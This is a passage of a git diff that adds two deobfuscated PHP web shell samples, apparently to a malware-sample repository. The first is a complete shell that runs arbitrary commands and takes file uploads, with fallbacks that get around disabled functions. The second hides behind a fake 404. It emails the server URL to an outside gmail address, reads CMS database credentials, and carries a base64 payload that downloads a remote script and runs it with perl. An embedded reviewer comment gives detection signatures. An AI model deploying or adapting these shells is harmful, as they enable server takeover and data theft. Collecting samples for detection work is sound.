== 0 && file_exists($this->options['name'] . ($this->options['type'] == "gzip" || $this->options['type'] == "bzip" ? 
".tmp" : ""))) + { + $this->error[] = "File {$this->options['name']} already exists."; + chdir($pwd); + return 0; + } + else if ($this->archive = @fopen($this->options['name'] . ($this->options['type'] == "gzip" || $this->options['type'] == "bzip" ? ".tmp" : ""), "wb+")) + chdir($pwd); + else + { + $this->error[] = "Could not open {$this->options['name']} for writing."; + chdir($pwd); + return 0; + } + } + else + $this->archive = ""; + + switch ($this->options['type']) + { + case "zip": + if (!$this->create_zip()) + { + $this->error[] = "Could not create zip file."; + return 0; + } + break; + case "bzip": + if (!$this->create_tar()) + { + $this->error[] = "Could not create tar file."; + return 0; + } + if (!$this->create_bzip()) + { + $this->error[] = "Could not create bzip2 file."; + return 0; + } + break; + case "gzip": + if (!$this->create_tar()) + { + $this->error[] = "Could not create tar file."; + return 0; + } + if (!$this->create_gzip()) + { + $this->error[] = "Could not create gzip file."; + return 0; + } + break; + case "tar": + if (!$this->create_tar()) + { + $this->error[] = "Could not create tar file."; + return 0; + } + } + + if ($this->options['inmemory'] == 0) + { + fclose($this->archive); + if ($this->options['type'] == "gzip" || $this->options['type'] == "bzip") + unlink($this->options['basedir'] . "/" . $this->options['name'] . 
".tmp"); + } + } + + function add_data($data) + { + if ($this->options['inmemory'] == 0) + fwrite($this->archive, $data); + else + $this->archive .= $data; + } + + function make_list() + { + if (!empty ($this->exclude)) + foreach ($this->files as $key => $value) + foreach ($this->exclude as $current) + if ($value['name'] == $current['name']) + unset ($this->files[$key]); + if (!empty ($this->storeonly)) + foreach ($this->files as $key => $value) + foreach ($this->storeonly as $current) + if ($value['name'] == $current['name']) + $this->files[$key]['method'] = 0; + unset ($this->exclude, $this->storeonly); + } + + function add_files($list) + { + $temp = $this->list_files($list); + foreach ($temp as $current) + $this->files[] = $current; + } + + function exclude_files($list) + { + $temp = $this->list_files($list); + foreach ($temp as $current) + $this->exclude[] = $current; + } + + function store_files($list) + { + $temp = $this->list_files($list); + foreach ($temp as $current) + $this->storeonly[] = $current; + } + + function list_files($list) + { + if (!is_array ($list)) + { + $temp = $list; + $list = array ($temp); + unset ($temp); + } + + $files = array (); + + $pwd = getcwd(); + chdir($this->options['basedir']); + + foreach ($list as $current) + { + $current = str_replace("\\", "/", $current); + $current = preg_replace("/\/+/", "/", $current); + $current = preg_replace("/\/$/", "", $current); + if (strstr($current, "*")) + { + $regex = preg_replace("/([\\\^\$\.\[\]\|\(\)\?\+\{\}\/])/", "\\\\\\1", $current); + $regex = str_replace("*", ".*", $regex); + $dir = strstr($current, "/") ? 
substr($current, 0, strrpos($current, "/")) : "."; + $temp = $this->parse_dir($dir); + foreach ($temp as $current2) + if (preg_match("/^{$regex}$/i", $current2['name'])) + $files[] = $current2; + unset ($regex, $dir, $temp, $current); + } + else if (@is_dir($current)) + { + $temp = $this->parse_dir($current); + foreach ($temp as $file) + $files[] = $file; + unset ($temp, $file); + } + else if (@file_exists($current)) + $files[] = array ('name' => $current, 'name2' => $this->options['prepend'] . + preg_replace("/(\.+\/+)+/", "", ($this->options['storepaths'] == 0 && strstr($current, "/")) ? + substr($current, strrpos($current, "/") + 1) : $current), + 'type' => @is_link($current) && $this->options['followlinks'] == 0 ? 2 : 0, + 'ext' => substr($current, strrpos($current, ".")), 'stat' => stat($current)); + } + + chdir($pwd); + + unset ($current, $pwd); + + usort($files, array ("archive", "sort_files")); + + return $files; + } + + function parse_dir($dirname) + { + if ($this->options['storepaths'] == 1 && !preg_match("/^(\.+\/*)+$/", $dirname)) + $files = array (array ('name' => $dirname, 'name2' => $this->options['prepend'] . + preg_replace("/(\.+\/+)+/", "", ($this->options['storepaths'] == 0 && strstr($dirname, "/")) ? + substr($dirname, strrpos($dirname, "/") + 1) : $dirname), 'type' => 5, 'stat' => stat($dirname))); + else + $files = array (); + $dir = @opendir($dirname); + + while ($file = @readdir($dir)) + { + $fullname = $dirname . "/" . $file; + if ($file == "." || $file == "..") + continue; + else if (@is_dir($fullname)) + { + if (empty ($this->options['recurse'])) + continue; + $temp = $this->parse_dir($fullname); + foreach ($temp as $file2) + $files[] = $file2; + } + else if (@file_exists($fullname)) + $files[] = array ('name' => $fullname, 'name2' => $this->options['prepend'] . + preg_replace("/(\.+\/+)+/", "", ($this->options['storepaths'] == 0 && strstr($fullname, "/")) ? 
+ substr($fullname, strrpos($fullname, "/") + 1) : $fullname), + 'type' => @is_link($fullname) && $this->options['followlinks'] == 0 ? 2 : 0, + 'ext' => substr($file, strrpos($file, ".")), 'stat' => stat($fullname)); + } + + @closedir($dir); + + return $files; + } + + function sort_files($a, $b) + { + if ($a['type'] != $b['type']) + if ($a['type'] == 5 || $b['type'] == 2) + return -1; + else if ($a['type'] == 2 || $b['type'] == 5) + return 1; + else if ($a['type'] == 5) + return strcmp(strtolower($a['name']), strtolower($b['name'])); + else if ($a['ext'] != $b['ext']) + return strcmp($a['ext'], $b['ext']); + else if ($a['stat'][7] != $b['stat'][7]) + return $a['stat'][7] > $b['stat'][7] ? -1 : 1; + else + return strcmp(strtolower($a['name']), strtolower($b['name'])); + return 0; + } + + function download_file() + { + if ($this->options['inmemory'] == 0) + { + $this->error[] = "Can only use download_file() if archive is in memory. Redirect to file otherwise, it is faster."; + return; + } + switch ($this->options['type']) + { + case "zip": + header("Content-Type: application/zip"); + break; + case "bzip": + header("Content-Type: application/x-bzip2"); + break; + case "gzip": + header("Content-Type: application/x-gzip"); + break; + case "tar": + header("Content-Type: application/x-tar"); + } + $header = "Content-Disposition: attachment; filename=\""; + $header .= strstr($this->options['name'], "/") ? substr($this->options['name'], strrpos($this->options['name'], "/") + 1) : $this->options['name']; + $header .= "\""; + header($header); + header("Content-Length: " . 
strlen($this->archive)); + header("Content-Transfer-Encoding: binary"); + header("Cache-Control: no-cache, must-revalidate, max-age=60"); + header("Expires: Sat, 01 Jan 2000 12:00:00 GMT"); + print($this->archive); + } +} + +class tar_file extends archive +{ + function tar_file($name) + { + $this->archive($name); + $this->options['type'] = "tar"; + } + + function create_tar() + { + $pwd = getcwd(); + chdir($this->options['basedir']); + + foreach ($this->files as $current) + { + if ($current['name'] == $this->options['name']) + continue; + if (strlen($current['name2']) > 99) + { + $path = substr($current['name2'], 0, strpos($current['name2'], "/", strlen($current['name2']) - 100) + 1); + $current['name2'] = substr($current['name2'], strlen($path)); + if (strlen($path) > 154 || strlen($current['name2']) > 99) + { + $this->error[] = "Could not add {$path}{$current['name2']} to archive because the filename is too long."; + continue; + } + } + $block = pack("a100a8a8a8a12a12a8a1a100a6a2a32a32a8a8a155a12", $current['name2'], sprintf("%07o", + $current['stat'][2]), sprintf("%07o", $current['stat'][4]), sprintf("%07o", $current['stat'][5]), + sprintf("%011o", $current['type'] == 2 ? 0 : $current['stat'][7]), sprintf("%011o", $current['stat'][9]), + " ", $current['type'], $current['type'] == 2 ? @readlink($current['name']) : "", "ustar ", " ", + "Unknown", "Unknown", "", "", !empty ($path) ? 
$path : "", ""); + + $checksum = 0; + for ($i = 0; $i < 512; $i++) + $checksum += ord(substr($block, $i, 1)); + $checksum = pack("a8", sprintf("%07o", $checksum)); + $block = substr_replace($block, $checksum, 148, 8); + + if ($current['type'] == 2 || $current['stat'][7] == 0) + $this->add_data($block); + else if ($fp = @fopen($current['name'], "rb")) + { + $this->add_data($block); + while ($temp = fread($fp, 1048576)) + $this->add_data($temp); + if ($current['stat'][7] % 512 > 0) + { + $temp = ""; + for ($i = 0; $i < 512 - $current['stat'][7] % 512; $i++) + $temp .= "\0"; + $this->add_data($temp); + } + fclose($fp); + } + else + $this->error[] = "Could not open file {$current['name']} for reading. It was not added."; + } + + $this->add_data(pack("a1024", "")); + + chdir($pwd); + + return 1; + } + + function extract_files() + { + $pwd = getcwd(); + chdir($this->options['basedir']); + + if ($fp = $this->open_archive()) + { + if ($this->options['inmemory'] == 1) + $this->files = array (); + + while ($block = fread($fp, 512)) + { + $temp = unpack("a100name/a8mode/a8uid/a8gid/a12size/a12mtime/a8checksum/a1type/a100symlink/a6magic/a2temp/a32temp/a32temp/a8temp/a8temp/a155prefix/a12temp", $block); + $file = array ( + 'name' => $temp['prefix'] . 
$temp['name'], + 'stat' => array ( + 2 => $temp['mode'], + 4 => octdec($temp['uid']), + 5 => octdec($temp['gid']), + 7 => octdec($temp['size']), + 9 => octdec($temp['mtime']), + ), + 'checksum' => octdec($temp['checksum']), + 'type' => $temp['type'], + 'magic' => $temp['magic'], + ); + if ($file['checksum'] == 0x00000000) + break; + else if (substr($file['magic'], 0, 5) != "ustar") + { + $this->error[] = "This script does not support extracting this type of tar file."; + break; + } + $block = substr_replace($block, " ", 148, 8); + $checksum = 0; + for ($i = 0; $i < 512; $i++) + $checksum += ord(substr($block, $i, 1)); + if ($file['checksum'] != $checksum) + $this->error[] = "Could not extract from {$this->options['name']}, it is corrupt."; + + if ($this->options['inmemory'] == 1) + { + $file['data'] = fread($fp, $file['stat'][7]); + fread($fp, (512 - $file['stat'][7] % 512) == 512 ? 0 : (512 - $file['stat'][7] % 512)); + unset ($file['checksum'], $file['magic']); + $this->files[] = $file; + } + else if ($file['type'] == 5) + { + if (!is_dir($file['name'])) + mkdir($file['name'], $file['stat'][2]); + } + else if ($this->options['overwrite'] == 0 && file_exists($file['name'])) + { + $this->error[] = "{$file['name']} already exists."; + continue; + } + else if ($file['type'] == 2) + { + symlink($temp['symlink'], $file['name']); + chmod($file['name'], $file['stat'][2]); + } + else if ($new = @fopen($file['name'], "wb")) + { + fwrite($new, fread($fp, $file['stat'][7])); + fread($fp, (512 - $file['stat'][7] % 512) == 512 ? 
0 : (512 - $file['stat'][7] % 512)); + fclose($new); + chmod($file['name'], $file['stat'][2]); + } + else + { + $this->error[] = "Could not open {$file['name']} for writing."; + continue; + } + chown($file['name'], $file['stat'][4]); + chgrp($file['name'], $file['stat'][5]); + touch($file['name'], $file['stat'][9]); + unset ($file); + } + } + else + $this->error[] = "Could not open file {$this->options['name']}"; + + chdir($pwd); + } + + function open_archive() + { + return @fopen($this->options['name'], "rb"); + } +} + +class gzip_file extends tar_file +{ + function gzip_file($name) + { + $this->tar_file($name); + $this->options['type'] = "gzip"; + } + + function create_gzip() + { + if ($this->options['inmemory'] == 0) + { + $pwd = getcwd(); + chdir($this->options['basedir']); + if ($fp = gzopen($this->options['name'], "wb{$this->options['level']}")) + { + fseek($this->archive, 0); + while ($temp = fread($this->archive, 1048576)) + gzwrite($fp, $temp); + gzclose($fp); + chdir($pwd); + } + else + { + $this->error[] = "Could not open {$this->options['name']} for writing."; + chdir($pwd); + return 0; + } + } + else + $this->archive = gzencode($this->archive, $this->options['level']); + + return 1; + } + + function open_archive() + { + return @gzopen($this->options['name'], "rb"); + } +} + +class bzip_file extends tar_file +{ + function bzip_file($name) + { + $this->tar_file($name); + $this->options['type'] = "bzip"; + } + + function create_bzip() + { + if ($this->options['inmemory'] == 0) + { + $pwd = getcwd(); + chdir($this->options['basedir']); + if ($fp = bzopen($this->options['name'], "wb")) + { + fseek($this->archive, 0); + while ($temp = fread($this->archive, 1048576)) + bzwrite($fp, $temp); + bzclose($fp); + chdir($pwd); + } + else + { + $this->error[] = "Could not open {$this->options['name']} for writing."; + chdir($pwd); + return 0; + } + } + else + $this->archive = bzcompress($this->archive, $this->options['level']); + + return 1; + } + + function 
open_archive() + { + return @bzopen($this->options['name'], "rb"); + } +} + +class zip_file extends archive +{ + function zip_file($name) + { + $this->archive($name); + $this->options['type'] = "zip"; + } + + function create_zip() + { + $files = 0; + $offset = 0; + $central = ""; + + if (!empty ($this->options['sfx'])) + if ($fp = @fopen($this->options['sfx'], "rb")) + { + $temp = fread($fp, filesize($this->options['sfx'])); + fclose($fp); + $this->add_data($temp); + $offset += strlen($temp); + unset ($temp); + } + else + $this->error[] = "Could not open sfx module from {$this->options['sfx']}."; + + $pwd = getcwd(); + chdir($this->options['basedir']); + + foreach ($this->files as $current) + { + if ($current['name'] == $this->options['name']) + continue; + + $timedate = explode(" ", date("Y n j G i s", $current['stat'][9])); + $timedate = ($timedate[0] - 1980 << 25) | ($timedate[1] << 21) | ($timedate[2] << 16) | + ($timedate[3] << 11) | ($timedate[4] << 5) | ($timedate[5]); + + $block = pack("VvvvV", 0x04034b50, 0x000A, 0x0000, (isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate); + + if ($current['stat'][7] == 0 && $current['type'] == 5) + { + $block .= pack("VVVvv", 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']) + 1, 0x0000); + $block .= $current['name2'] . "/"; + $this->add_data($block); + $central .= pack("VvvvvVVVVvvvvvVV", 0x02014b50, 0x0014, $this->options['method'] == 0 ? 0x0000 : 0x000A, 0x0000, + (isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate, + 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']) + 1, 0x0000, 0x0000, 0x0000, 0x0000, $current['type'] == 5 ? 0x00000010 : 0x00000000, $offset); + $central .= $current['name2'] . 
"/"; + $files++; + $offset += (31 + strlen($current['name2'])); + } + else if ($current['stat'][7] == 0) + { + $block .= pack("VVVvv", 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']), 0x0000); + $block .= $current['name2']; + $this->add_data($block); + $central .= pack("VvvvvVVVVvvvvvVV", 0x02014b50, 0x0014, $this->options['method'] == 0 ? 0x0000 : 0x000A, 0x0000, + (isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate, + 0x00000000, 0x00000000, 0x00000000, strlen($current['name2']), 0x0000, 0x0000, 0x0000, 0x0000, $current['type'] == 5 ? 0x00000010 : 0x00000000, $offset); + $central .= $current['name2']; + $files++; + $offset += (30 + strlen($current['name2'])); + } + else if ($fp = @fopen($current['name'], "rb")) + { + $temp = fread($fp, $current['stat'][7]); + fclose($fp); + $crc32 = crc32($temp); + if (!isset($current['method']) && $this->options['method'] == 1) + { + $temp = gzcompress($temp, $this->options['level']); + $size = strlen($temp) - 6; + $temp = substr($temp, 2, $size); + } + else + $size = strlen($temp); + $block .= pack("VVVvv", $crc32, $size, $current['stat'][7], strlen($current['name2']), 0x0000); + $block .= $current['name2']; + $this->add_data($block); + $this->add_data($temp); + unset ($temp); + $central .= pack("VvvvvVVVVvvvvvVV", 0x02014b50, 0x0014, $this->options['method'] == 0 ? 0x0000 : 0x000A, 0x0000, + (isset($current['method']) || $this->options['method'] == 0) ? 0x0000 : 0x0008, $timedate, + $crc32, $size, $current['stat'][7], strlen($current['name2']), 0x0000, 0x0000, 0x0000, 0x0000, 0x00000000, $offset); + $central .= $current['name2']; + $files++; + $offset += (30 + strlen($current['name2']) + $size); + } + else + $this->error[] = "Could not open file {$current['name']} for reading. It was not added."; + } + + $this->add_data($central); + + $this->add_data(pack("VvvvvVVv", 0x06054b50, 0x0000, 0x0000, $files, $files, strlen($central), $offset, + !empty ($this->options['comment']) ? 
strlen($this->options['comment']) : 0x0000)); + + if (!empty ($this->options['comment'])) + $this->add_data($this->options['comment']); + + chdir($pwd); + + return 1; + } +} + +function copy_paste($c,$s,$d){ + if(is_dir($c.$s)) { + mkdir($d.$s); + $h = @opendir($c.$s); + while (($f = @readdir($h)) !== false) { + if (($f != ".") and ($f != "..")) { + copy_paste($c.$s.DS,$f, $d.$s.DS); + } + } + } elseif(is_file($c.$s)) { + @copy($c.$s, $d.$s); + } +} + +function system_custom($in) { + + $out = ''; + $system = false ; + if (cust_function_exists('exec')) { + $system = true ; + @exec($in,$out); + $out = @join("\n",$out); + } elseif (cust_function_exists('passthru')) { + $system = true ; + ob_start(); + @passthru($in); + $out = ob_get_clean(); + } elseif (cust_function_exists('system')) { + $system = true ; + ob_start(); + @system($in); + $out = ob_get_clean(); + } elseif (cust_function_exists('shell_exec')) { + $system = true ; + $out = shell_exec($in); + } elseif (is_resource($f = @popen($in,"r"))) { + $system = true ; + $out = ""; + while(!@feof($f)) + $out .= fread($f,1024); + pclose($f); + } + + if($system) { + return $out; + } + + $commands = explode(";", $in) ; + + $out = '' ; + $path = '' ; + + if($commands) { + foreach($commands as $command) { + $command_parts = explode(" ", $command) ; + $command_head = $command_parts[0] ; + $params = array() ; + if(count($command_parts) > 1) { + for($i=1;$i 1) { + $archive = new gzip_file($params[0]); + $archive->set_options(array('basedir' => $path, 'overwrite' => 1, 'level' => 1)); + $archive->add_files(array($params[1])); + $archive->create_archive(); + } + break; + case "zip": + if(class_exists('ZipArchive') && count($params) > 1) { + $zip = new ZipArchive(); + if ($zip->open($params[0], 1)) { + foreach($params as $k=>$param) { + if($k == 0 || $param == '..') + continue; + if(@is_file($param)) + $zip->addFile($param, $param); + elseif(@is_dir($param)) { + $iterator = new RecursiveIteratorIterator(new 
RecursiveDirectoryIterator($param.DS)); + foreach ($iterator as $key=>$value) { + $zip->addFile(realpath($key), $key); + } + } + } + $zip->close(); + } + } + break; + case "unzip": + if(class_exists('ZipArchive') && count($params) > 0) { + $zip = new ZipArchive(); + foreach($params as $k=>$param) { + if($zip->open($param)) { + $zip->extractTo($path); + $zip->close(); + } + } + } + break; + case "cp": + smartCopy($params[0], $params[1]) ; + break; + case "mv": + @rename($params[0], $params[1]) ; + break; + case "rm": + foreach($params as $param) { + if(!preg_match("/^-/", $param)) { + if($param == '..') + continue; + $param = urldecode($param); + if(is_dir($param)) { + deleteDir($param); + } elseif(is_file($param)) { + @unlink($param); + } + } + } + break; + case "uname": + $out = php_uname(preg_replace("/^-/", "", $params[0])) ; + break; + case "find": + $out = scandir_rec($params[0], true, 1) ; + $out = implode("\n", $out) ; + break; + case "ls": + if(isset($params[0]) && $params[0] == '-F') { + $_path = $path ; + if(isset($params[1])) { + $_path = $params[1] ; + } + $out = glob($_path . '/*' , GLOB_ONLYDIR); + if(!empty($out)) { + foreach($out as $k=>$v) { + $out[$k] = preg_replace("/^" . preg_quote($_path.DS,DS) . "/","",$v) . DS ; + } + } + $out = implode("\n", $out) ; + } else { + $_path = $path ; + if(isset($params[1])) { + $_path = $params[1] ; + } + $out = glob($_path . '/*'); + if(!empty($out)) { + foreach($out as $k=>$v) { + $out[$k] = preg_replace("/^" . preg_quote($path,DS) . "/","",$v) ; + } + } + $out = implode("\n", $out) ; + } + break; + case "mkdir": + @mkdir($params[0]) ; + break; + case "chmod": + @chmod($params[1], $params[0]) ; + break; + case "phpversion": + $out = phpversion() ; + break; + case "wso_version": + $out = "2.4"; + break; + case "safemode": + $out = @ini_get('safe_mode') ; + break; + case 'pwd': + $out = getcwd() ; + break; + default: + break; + } + } + } + + return $out ; + +} + +print ""; +print "

Restricted

";
+print "

Area

";
+print "

";
+
+if(isset($_POST['_cwd'])) {
+ $currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
+} else {
+ $currentWD = '' ;
+}
+if(isset($_POST['_cmd'])) {
+ $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+} else {
+ $currentCMD = '' ;
+}
+
+$UName = system_custom('uname -a');
+$SCWD = system_custom('pwd');
+$UserID = system_custom('id');
+
+if( $currentWD == "" ) {
+ $currentWD = $SCWD;
+}
+
+print "";
+print "";
+print "";
+print "";
+print "";
+print "
?:".(isset($_SERVER['REMOTE_HOST'])?$_SERVER['REMOTE_HOST']:"")." (".(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:"").")
s is:".(isset($_SERVER['SERVER_SIGNATURE'])?$_SERVER['SERVER_SIGNATURE']:"")."
ce e?:$UName
wtf:$UserID
"; + +print "

"; + +if( isset($_POST['_act']) && $_POST['_act'] == "List files!" ) { + $currentCMD = "ls -la"; +} + +print "
"; + +print ""; +print ""; + +print ""; +print ""; + +print ""; +print ""; + +print "
Execute command:
Change directory:
Upload file:


";
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( isset($_POST['_act']) && $_POST['_act'] == "Upload!" ) {
+ if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+ print "
Error while uploading file!
"; + } else { + print "
";
+        if(!@move_uploaded_file($_FILES['_upl']['tmp_name'], $currentWD."/".$_FILES['_upl']['name'])) {
+            $out = system_custom("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+        }
+        echo $out ;
+        print "
File uploaded successfully!
"; + } +} else { + print "\n\n\n
\n";
+    $currentCMD = "cd ".$currentWD.";".$currentCMD;
+    $out = system_custom($currentCMD);
+    echo $out ;
+    print "\n
\n\n\n

Command completed
";
+}
+
+exit;
+
+?>
diff --git a/Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php b/Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php
new file mode 100644
index 0000000..378e78d
--- /dev/null
+++ b/Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php
@@ -0,0 +1,506 @@
+user = get_current_user();
+ $this->os = $this->check("os");
+ $this->type = $this->check("cmd");
+ if (!isset($_GET['1180'])) {
+ if (isset($_GET['x1'])) {
+ $this->form();
+ echo ($this->os == "windows") ? '
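Review bot: This web shell sample is added as a directly runnable `.php` file with no analyst header, and the handler that closes the hunk passes `$_POST['_cwd']` and `$_POST['_cmd']` to `system_custom()` and moves `$_FILES['_upl']` into `$currentWD` with no access check visible in these lines, so a PHP-enabled server that ever exposes this checkout would run it. I would keep samples in a password-protected archive or under a name with no `.php` component (Apache `AddHandler` setups can still execute `name.php.txt`), and open the file with a comment such as `// MALWARE SAMPLE (web shell), analysis copy: do not deploy or serve`. For the detection write-up it is worth recording that `system_custom()` tries `exec`, `passthru`, `system`, `shell_exec` and `popen` and then falls back to pure-PHP versions of `cp`, `mv`, `rm`, `zip`, `unzip`, `chmod` and `ls`, so `disable_functions` alone does not contain it; the POST fields `_cmd`, `_cwd`, `_act`, `_upl` and the `wso_version` reply `2.4` are usable signatures. The start of the file is not readable in this rendering, so an earlier gate may exist that these lines do not show.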
' . $this->exe('dir') . '
' : '
' . $this->exe('ls -la') . '
'; + } else { + header("HTTP/1.0 404 Not Found"); + header("Status: 404 Not Found"); + echo "

Error 404 Not Found

"; + echo "The page that you have requested could not be found."; + die(); + exit(); + } + } else { + if (isset($_GET['x'])) { + switch ($_GET['x']) { + case 'get': + if (isset($_GET['file'])) { + $file = urldecode($_GET['file']); + $name = (isset($_GET['name'])) ? $_GET['name'] : "px.php"; + $code = file_get_contents($file); + $myfile = fopen($name, "w+"); + fwrite($myfile, $code); + fclose($myfile); + } + break; + case 'plbot': + $this->plBot(); + break; + case 'clear': + $this->delete("px.php"); + $this->delete("pl.php"); + break; + case 'read': + if (isset($_GET['path'])) { + $path = urldecode($_GET['path']); + $this->setDB($path); + } + break; + case 'jdb': + $this->joomlaDb(); + break; + case 'wpdb': + $this->wpDb(); + break; + case 'mail': + $mail = (isset($_GET['to'])) ? urldecode($_GET['to']) : "setoran.target26@gmail.com"; + $host = $_SERVER["HTTP_HOST"]; + $uri = $_SERVER["REQUEST_URI"]; + $serv = gethostbyname($_SERVER['SERVER_ADDR']); + $addr = gethostbyname($_SERVER['REMOTE_ADDR']); + mail($mail, "kiriman bos " . $host . $uri, "Url:" . $host . $uri . " nIp :$servn Ip injector: $addr"); + break; + case 'clone': + if (isset($_GET['path'])) { + $path = urldecode($_GET['path']); + if (strstr($path, ",")) { + $data = explode(",", $path); + if (is_array($data) && count($data) > 0) { + $data = array_filter($data); + if (count($data) > 0) { + foreach ($data as $k) { + $this->setClone($k); + } + } + } + } else { + $path = urldecode($_GET['path']); + $this->setClone($path); + } + } else { + $this->setClone('../.inc.php'); + $this->setClone('../../.inc.php'); + } + break; + case 'patch': + $lock = (isset($_GET['lock'])) ? 1 : 0; + $force = (isset($_GET['force'])) ? 
1 : 0; + $path = ""; + if (isset($_GET['path'])) { + $path = urldecode($_GET['path']); + if (strstr($path, ",")) { + $path = explode(",", $path); + } + } + if (isset($_GET['allow'])) { + $files = urldecode($_GET['allow']); + if (strstr($files, ",")) { + $file = explode(",", $files); + $this->setPatch($user, $file, $lock, $path, $force); + } else { + $this->setPatch($user, $files, $lock, $path, $force); + } + } else { + $this->setPatch($user, "", $lock, $path, $force); + } + break; + case 'chmod': + if (isset($_GET['dir'])) { + $dir = $_GET['dir']; + if ($dir == 1) { + chmod("./", 0555); + } else if ($dir == 2) { + chmod("./", 0555); + chmod("../", 0555); + } else if ($dir == 3) { + chmod("./", 0555); + chmod("../", 0555); + chmod("../../", 0555); + } else { + $dir = str_replace("|", "/", $dir); + chmod($dir, 0555); + } + } + break; + case 'die': + $source = $_SERVER['SCRIPT_FILENAME']; + @unlink($source); + break; + } + } else { + if (isset($_GET['del'])) { + $del = $_GET['del']; + if (strstr($del, ",")) { + $data = explode(",", $del); + if (is_array($data) && count($data) > 0) { + $data = array_filter($data); + foreach ($data as $k) { + $this->delete($k); + } + } + } else { + $this->delete($del); + } + } + $this->getForm(); + } + } + } + private function plBot() { + $code = "PD9waHANCiR1cmwgPSAoaXNzZXQoJF9HRVRbJ3VybCddKSkgPyB1cmxkZWNvZGUoJF9HRVRbJ3VybCddKSA6ICJodHRwOi8vd3d3LmhvdGVscmlzdG9yYW50ZWxlcGFudG8uaXQvZm9ybS8vLi4uL3JvYm90LnR4 + +dCI7DQoNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCglAZXhlYygnd2dldCAnLiR1cmwuJyAtTyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV + +4ZWMoJ2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdsd3AtZG93bmxvYWQgLWEgJy4kdXJsLicgcm9ib3QudHh0O3 + +Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdseW54IC1zb3VyY2UgJy4kdXJsLicgPiByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gL + 
+WZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnR0VUICcuJHVybC4nID5y + +b2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ3JtIC1yZiByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO3dnZXQgJy4kdXJsLicgLU8gcm9ib3Q + +udHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO2N1cmwgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYi + +oudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7bHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAZXhlYygnY2QgL3Rtc + +DtseW54IC1zb3VyY2UgJy4kdXJsLicgPiByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7ZmV0Y2ggLW8gcm9ib3QudHh0ICcuJHVy + +bC4nO3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdjZCAvdG1wO0dFVCAnLiR1cmwuJyA + ++cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBleGVjKCdybSAtcmYgaW5kZXgucGhwLionKTsNCglAZXhlYygnY2QgL3RtcDtybSAtcmYgcm9iKi50eHQnKT + +sNCglAZXhlYygncm0gLXJmIHJvYioudHh0Jyk7DQoJQGV4ZWMoJ2NkIC90bXA7cm0gLXJmIHJvYioudHh0KicpOw0KCUBleGVjKCdybSAtcmYgcm9iKi50eHQqJyk7DQp9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZ + +WxsX2V4ZWMnKSl7DQoJQHNoZWxsX2V4ZWMoJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzaGVsbF9leGVjKCdjdXJsICcu + +JHVybC4nIC1vIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnbHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJ + +vYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc2hlbGxfZXhlYygnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC + 